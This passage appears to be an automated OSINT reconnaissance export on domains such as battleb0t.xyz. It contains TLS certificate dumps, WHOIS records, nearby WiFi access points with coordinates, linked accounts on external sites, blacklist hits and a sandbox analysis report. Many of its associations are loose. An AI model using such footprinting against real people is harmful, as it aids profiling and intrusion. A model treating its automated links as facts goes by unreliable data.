28:bd:e6:69:65:a7:0a:f0:76:9d:7c:ae:23:47:a4:
a0:54:01:4b:e1:a1:6c:56:66:e9:5f:20:b4:97:88:
6b:ae:96:63:a2:7f:14:d1:e7:4b:38:62:1b:57:9e:
5f:19:6f:4a:f8:f3:3f:ef:b1:e8:e9:b2:bb:cb:cb:
97:cd:3c:47:76:5d:e9:c6:1b:37:bc:84:42:29:b5:
65:be:97:34:7e:ff:74:79:85:f4:78:a1:2a:b1:60:
7b:21
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FA:7E:08:50:07:6C:FD:DC:A8:68:45:A3:97:1C:E4:28:15:A8:2F:9D
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/Yj_rNAxE9pQ
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/ihFiAY-64YY.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
45:c0:ed:fe:c5:44:0c:96:51:92:15:dc:2f:1d:e5:5e:4c:7f:
89:4a:3f:3d:94:64:76:5e:6b:ff:8c:03:7f:eb:ae:61:c0:89:
16:34:3c:a1:d5:87:98:35:53:48:52:1e:b4:61:d3:7d:9f:96:
bd:0f:71:c5:cf:b6:14:12:8a:01:59:97:dc:9b:84:b8:dd:00:
79:7f:7b:33:b7:24:69:1f:af:bd:66:ab:a1:a1:aa:55:6d:07:
62:b3:82:ac:fd:d6:53:44:01:3b:7c:3d:b9:8c:0c:8a:49:6d:
d5:e2:69:ce:ba:89:85:d0:a0:a7:81:a9:33:e3:76:b1:ed:fb:
71:7d:21:ea:82:98:93:f2:93:44:03:80:07:95:04:86:b6:71:
7f:1b:b4:73:ab:10:06:9e:6f:7b:f8:37:23:5b:20:c2:b0:1b:
8c:a9:f0:bb:c8:15:54:65:03:66:2b:65:2b:dd:c8:82:36:7d:
72:f9:d2:d6:5a:4a:b5:ef:a1:6b:50:f2:a1:c4:4a:6e:36:35:
c1:77:e5:2a:d0:28:89:59:f4:ec:d9:e0:96:66:a5:63:34:40:
69:7a:2a:6c:50:eb:81:e2:8a:ed:dd:bc:84:68:33:dd:56:7f:
0b:5f:af:bd:a2:2e:a4:1d:b3:12:b6:18:66:80:38:3d:ab:75:
96:5c:c6:6f
|
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | S-lan (Net ID: 00:01:24:F1:91:41) | 37.780462,-122.390564 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | sflan50 (Net ID: 00:02:6F:32:A9:45) | 37.7642, -122.3993 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | YouTube User (Category: video)
https://www.youtube.com/user/ayshoo/about | ayshoo |
| 2023-05-12 02:56:54 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 2 | 0 | None | cp.keyubu.net | 87.248.157.102 |
| 2023-05-12 03:09:40 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 117.48.229.35.bc.googleusercontent.com | 35.229.48.117 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | United States | Domain Name: 00RZ.COM
Registry Domain ID: 1545841665_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2022-12-26T09:10:34Z
Creation Date: 2009-03-07T02:16:40Z
Registry Expiry Date: 2024-03-07T02:16:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: 480-624-2505
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: NS17.DOMAINCONTROL.COM
Name Server: NS18.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:09:19Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: 00RZ.COM
Registry Domain ID: 1545841665_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-26T04:10:32Z
Creation Date: 2009-03-06T21:16:40Z
Registrar Registration Expiration Date: 2024-03-06T21:16:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=00RZ.COM
Registry Admin ID: Not Available From Registry
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=00RZ.COM
Registry Tech ID: Not Available From Registry
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=00RZ.COM
Name Server: NS17.DOMAINCONTROL.COM
Name Server: NS18.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:09:27Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F6:C3:DF) | 41.8781, -87.6298 |
| 2023-05-12 02:56:45 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:97:99:5c:60:ac:40:68:f8:b2:de:0a:67:7a:da:b7:d1:16
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 24 03:02:53 2023 GMT
Not After : May 25 03:02:52 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ed:bc:d0:71:75:f9:c1:51:79:49:f8:25:6c:e2:
4b:7a:05:e1:2b:6c:79:44:98:ff:b2:cc:bc:d7:da:
27:25:29:37:c7:ba:80:cb:e1:7c:b8:4d:37:a2:bc:
93:44:eb:bc:62:ff:47:cb:21:ea:3d:05:4c:04:57:
82:93:5b:a9:25:29:fb:98:33:b0:04:74:aa:bc:9a:
64:5e:c7:e2:6c:e5:ec:2a:e7:40:6b:e1:75:93:39:
b3:cf:b8:e9:11:29:e6:d1:9e:08:56:54:16:9f:c1:
1d:1f:f5:f6:ca:48:3a:94:53:03:1d:bf:52:af:6e:
27:9d:80:8d:f0:57:28:d4:f0:01:34:f4:39:59:4a:
df:9f:00:47:87:9a:39:38:c1:8f:84:8a:02:0b:b2:
6e:5c:36:a2:f6:35:e6:d2:23:6b:29:b1:15:aa:86:
a3:5b:eb:30:cc:af:b8:df:d5:0e:8f:8e:29:7e:0d:
21:28:d0:d2:4c:71:5b:19:01:9b:dc:b9:90:88:7d:
fc:5d:3e:72:44:e6:46:11:dd:e6:fd:a5:42:a3:07:
24:e7:29:d9:29:1c:f3:72:77:8b:cb:0b:df:45:34:
0b:81:a8:00:de:f0:13:74:1b:bf:2f:61:ad:65:73:
29:3e:05:b5:c3:90:28:8c:96:ef:cb:b3:06:ba:9b:
6b:f7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C4:85:82:A3:5E:ED:4D:54:E9:0D:BD:02:AC:67:B2:FA:F3:E1:58:3F
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
a3:c5:54:80:ec:15:48:8e:60:57:c2:56:21:02:dc:33:b2:67:
3c:b1:4d:e5:1f:de:da:ed:a7:e3:8d:b7:03:a3:f4:cc:b6:e1:
1e:b1:21:17:9e:36:0c:2a:fd:f3:0a:f5:98:b6:cc:3c:01:67:
f2:0d:fc:88:12:e2:d6:83:96:22:f2:3a:bb:54:5e:67:b9:fa:
0b:ad:7a:8d:5d:db:b1:9d:a3:cb:38:99:91:47:54:50:04:49:
4c:4b:88:c5:e7:74:21:f3:ca:60:d8:72:6d:c3:a3:f9:c2:7e:
0b:52:23:2d:ac:85:06:0b:ad:5c:f7:db:13:07:0b:7b:6d:f5:
2f:d3:bc:b1:6b:2a:74:2f:9e:80:c3:aa:10:0b:63:bc:43:b6:
74:f7:8c:dd:83:d1:7d:5d:ba:58:70:ca:ea:2d:07:d9:a9:56:
60:b3:6e:29:b1:ee:a9:c9:ca:0f:33:89:8b:44:0b:de:d1:75:
1d:b7:8b:4c:86:7b:5b:32:c0:1e:15:9e:8b:ec:63:cf:99:d1:
62:4e:5a:85:07:ac:08:3d:a0:31:af:ac:50:c9:09:ed:b3:2e:
9f:e5:63:7d:b8:46:50:15:49:e6:16:2e:ad:ae:5c:d1:17:72:
04:af:52:88:b6:66:c9:13:ad:15:0a:c2:ba:2f:69:ae:eb:7a:
39:e4:67:40
| battleb0t.xyz |
| 2023-05-12 02:45:24 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'HE', u'country_tld': u'.de', u'ip': u'64.226.81.43', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 82927922, u'country_code': u'DE', u'timezone': u'Europe/Berlin', u'city': u'Frankfurt am Main', u'network': u'64.226.80.0/20', u'languages': u'de', u'version': u'IPv4', u'latitude': 50.113381, u'in_eu': True, u'utc_offset': u'+0200', u'continent_code': u'EU', u'country_name': u'Germany', u'country_capital': u'Berlin', u'org': u'DIGITALOCEAN-ASN', u'postal': u'60311', u'asn': u'AS14061', u'country': u'DE', u'region': u'Hesse', u'longitude': 8.671931, u'country_calling_code': u'+49', u'country_area': 357021.0, u'country_code_iso3': u'DEU'} | 64.226.81.43 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Steve (Net ID: 00:16:E3:41:0D:E8) | 40.2024, 29.0398 |
| 2023-05-12 02:48:19 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:50:55:6d:e5:64:92:a0:7f:d0:de:03:2b:af:77:c2:fc:fe
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: May 4 19:22:49 2023 GMT
Not After : Aug 2 19:22:48 2023 GMT
Subject: CN=nwapi2.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c4:56:92:fa:17:84:ee:f0:d0:57:46:44:1b:c0:
a4:14:29:10:a1:ef:73:a4:e7:64:f7:b5:e7:3f:b3:
66:76:75:96:94:eb:49:c3:b4:7b:98:99:f2:0f:53:
8b:0d:5d:a1:7d:07:f5:ec:33:33:f7:d8:24:d7:52:
d5:12:6d:a1:1f:e4:a6:4e:04:dc:3d:ec:3d:be:c0:
68:52:81:bd:0e:b0:f2:dc:e9:9e:c3:80:ab:29:55:
f9:1e:e7:5b:91:26:2d:a5:23:af:31:21:a7:26:77:
4d:22:98:0f:3c:48:92:7d:11:24:a2:2a:0b:37:5b:
b7:75:5d:9c:47:56:23:11:ea:1f:65:df:5a:99:2d:
b1:7c:34:88:13:dd:65:4f:a0:08:9d:d3:51:25:a6:
78:33:43:63:15:48:98:b7:c9:2d:ff:76:3d:7c:7e:
de:53:44:95:89:fa:a0:73:8e:18:62:72:8d:27:49:
aa:9c:1f:aa:7b:22:63:3f:e5:47:2d:46:e9:11:a7:
d9:be:31:17:58:ae:26:cb:94:ea:b8:74:2e:d5:e8:
97:bd:26:29:ad:75:15:d7:0b:3c:87:ec:7d:26:04:
ba:6b:7d:a6:11:27:4a:69:b1:b7:ca:99:b8:9d:ff:
7b:56:12:82:6a:1b:ca:28:1f:06:65:69:79:cd:93:
18:d1:f0:f1:97:01:54:01:52:f9:a4:bc:b1:5f:7f:
07:cd:e4:2b:75:9a:b4:04:a5:b3:96:5c:fa:5f:34:
4a:10:9c:af:38:59:33:75:87:74:42:bf:9b:c5:16:
68:7e:6e:ef:bf:b4:49:f4:b3:b2:df:03:0b:41:57:
bd:9d:b3:e1:0a:ab:4d:b6:f0:4f:0a:55:ab:67:0d:
47:01:8e:e0:df:09:34:38:59:4b:e4:b2:f9:93:a9:
14:cd:7f:e8:59:e4:10:fd:c1:6c:48:fa:be:99:2c:
29:f5:4b:bb:ec:4a:d6:b7:12:55:98:93:98:eb:47:
5c:a0:a4:28:64:3b:23:a2:ef:82:47:19:63:8d:bd:
5b:18:22:cf:f0:62:27:bf:ee:4a:28:c1:7c:e2:7b:
78:12:dd:d5:e8:7d:85:3e:1e:0f:49:a2:f3:4c:aa:
0d:2d:cc:58:f9:3e:e7:38:d6:30:4c:04:5a:18:cf:
9c:92:c9:94:e0:25:8d:f8:47:4e:48:b9:1f:15:b5:
e5:de:4b:35:84:12:32:49:2b:fa:a7:68:2a:1b:83:
d8:7f:e6:d9:7f:ca:74:5f:b4:c9:a0:67:b2:29:ff:
a2:1e:11:be:bc:99:7a:fb:44:7b:a4:fe:9c:6b:8f:
e3:20:e4:b7:4f:84:65:a3:c1:39:7b:b5:4f:1d:d0:
69:a0:23
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CB:34:4D:A2:38:84:54:47:A0:B5:F7:DD:3C:83:22:CF:57:4A:1C:21
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi2.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
0a:70:c1:db:70:e8:b9:50:30:b7:33:82:8e:fc:63:b0:63:ad:
97:e6:50:23:e8:d8:fd:32:74:4a:a7:58:9f:cf:c8:b6:a2:cd:
7e:28:74:19:38:ee:dc:ac:6a:d0:c4:5a:10:c7:c3:c1:0d:21:
b4:ff:86:61:30:4b:7d:10:9a:6d:10:38:4e:dc:1b:20:ad:54:
dd:8b:f9:7d:21:27:78:df:f9:73:ac:1b:f2:16:30:85:73:06:
19:38:d2:0d:2a:2f:fc:b8:ba:a6:8c:6a:bd:c8:da:cd:6a:e6:
e4:d5:b0:9f:b7:e5:07:a1:e6:c4:64:49:4e:a2:03:a3:bb:09:
77:55:6d:a7:9f:75:ea:9d:72:47:23:48:8a:7d:88:e5:aa:dd:
ab:25:4c:7b:7d:5c:a4:22:dd:53:9e:e1:3c:87:e3:cc:89:d0:
b4:6c:0c:61:00:8e:aa:db:85:6f:38:41:eb:4d:06:95:0f:0d:
4e:20:67:94:ec:1c:78:50:ed:0d:4f:1f:d7:4a:22:75:17:67:
0c:34:fe:7d:1a:30:5c:4f:39:17:f0:44:c2:e8:bd:ca:09:21:
03:9a:cb:da:b9:49:21:e4:b4:06:92:26:62:9e:1d:38:76:5b:
c4:c5:a8:a9:96:cc:aa:3e:01:a2:ae:8c:45:a0:e8:cf:2a:e0:
ca:8e:e5:18
| battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Maingau (Net ID: 00:02:2D:66:94:73) | 50.1188, 8.6843 |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.242): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Mastodon-API (Category: social)
https://mastodon.social/api/v2/search?q=login | login |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Gamespot (Category: gaming)
https://www.gamespot.com/profile/login/ | login |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | default (Net ID: 00:01:71:0A:12:B3) | 52.3759, 4.8975 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Chess.com (Category: gaming)
https://www.chess.com/member/battleb0t | battleb0t |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BARWN-Public (Net ID: 00:02:6F:03:AE:69) | 37.7642, -122.3993 |
| 2023-05-12 03:01:10 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.123): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F7:8C:15) | 41.8781, -87.6298 |
| 2023-05-12 02:56:50 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://zacharyburdette.com/index.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "IsoScope_aec_IESQMMUTEX_0_331"\n "IsoScope_aec_IESQMMUTEX_0_303"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_aec_IE_EarlyTabStart_0xe60_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_aec_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_aec_ConnHashTable<2796>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2796"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_aec_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /index.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: zacharyburdette.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /index.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: zacharyburdette.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: zacharyburdette.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: zacharyburdette.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"35.229.48.116:443"\n "96.6.232.137:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar87C3.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar87C1.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab87C0.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab87C2.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "DA45VJAM.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DA45VJAM.txt]- [targetUID: 00000000-00002800]\n Dropped file: "YXLLLO20.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YXLLLO20.txt]- [targetUID: 00000000-00002796]\n Dropped file: "4WUOR0VH.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4WUOR0VH.txt]- [targetUID: 00000000-00002796]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "_8BA7CB83-7FF8-11ED-B877-0800273CFE14_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002800]\n "~DFD0CCD659A3A95644.TMP" has type "data"- Location: [%TEMP%\\~DFD0CCD659A3A95644.TMP]- [targetUID: 00000000-00002796]\n "DA45VJAM.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DA45VJAM.txt]- [targetUID: 00000000-00002800]\n "Tar87C3.tmp" has type "data"- Location: [%TEMP%\\Tar87C3.tmp]- [targetUID: 00000000-00002800]\n "Cab87C0.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab87C0.tmp]- [targetUID: 00000000-00002800]\n "~DFFE2FBB3610963E2C.TMP" has type "data"- Location: [%TEMP%\\~DFFE2FBB3610963E2C.TMP]- [targetUID: 00000000-00002796]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 